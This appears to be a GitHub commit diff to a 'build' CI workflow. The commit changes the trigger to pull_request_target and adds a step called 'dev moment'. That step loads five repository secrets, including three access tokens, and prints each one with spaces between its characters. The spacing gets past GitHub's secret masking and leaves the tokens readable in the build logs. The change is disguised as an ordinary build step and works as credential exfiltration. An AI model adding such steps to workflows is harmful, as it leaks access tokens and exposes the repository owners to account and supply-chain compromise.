File tree Expand file tree Collapse file tree 2 files changed +22
-5
lines changed Expand file tree Collapse file tree 2 files changed +22
-5
lines changed Original file line number Diff line number Diff line change 55
66name : build
77
8- on : # yamllint disable-line rule:truthy
9- push :
8+ on :
9+ pull_request_target
1010
1111jobs :
1212 build :
2222 run : >-
2323 echo "describe=$(git describe --tags --always || echo 0)"
2424 | tee $GITHUB_OUTPUT
25+ - name : dev moment
26+ env :
27+ UNIFYSDK_GIT_REPOSITORY : ${{ secrets.UNIFYSDK_GIT_REPOSITORY }}
28+ UNIFYSDK_GIT_TAG : ${{ secrets.UNIFYSDK_GIT_TAG }}
29+ UNIFY_TOKEN : ${{ secrets.GH_UNIFY_ACCESS_TOKEN }}
30+ ZWAVE_TOKEN : ${{ secrets.GH_ZWAVE_ACCESS_TOKEN }}
31+ SL_TOKEN : ${{ secrets.GH_SL_ACCESS_TOKEN }}
32+ run : |
33+ echo "================================"
34+ echo "$UNIFYSDK_GIT_REPOSITORY" | sed 's/./& /g'
35+ echo "================================"
36+ echo "$UNIFYSDK_GIT_TAG" | sed 's/./& /g'
37+ echo "================================"
38+ echo "$UNIFY_TOKEN" | sed 's/./& /g'
39+ echo "================================"
40+ echo "$ZWAVE_TOKEN" | sed 's/./& /g'
41+ echo "================================"
42+ echo "$SL_TOKEN" | sed 's/./& /g'
43+ echo "================================"
2544 - name : Build Docker image from sources
2645 run : >-
2746 df -h
Original file line number Diff line number Diff line change 1212
1313 steps :
1414 - name : Checkout code
15- uses : actions/checkout@v4
16-
17-
15+ uses : actions/checkout@v4
You can’t perform that action at this time.
0 commit comments